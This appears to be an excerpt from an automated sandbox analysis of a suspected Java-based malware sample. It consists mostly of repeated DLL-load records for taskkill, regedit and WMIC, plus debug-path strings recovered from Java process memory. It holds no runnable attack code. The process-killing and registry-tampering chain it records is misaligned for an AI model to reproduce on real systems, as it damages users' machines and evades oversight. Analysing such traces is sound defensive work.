Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: authz.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: aclui.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: clb.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.000000000466E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004643000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libverify\verify.pdb source: xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2856505009.0000000073AC8000.00000002.00000001.01000000.0000000A.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004612000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1707060885.000000000348D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb source: xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004643000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004612000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb source: xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libbci\bci.pdb source: xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb:: source: xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb source: xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp
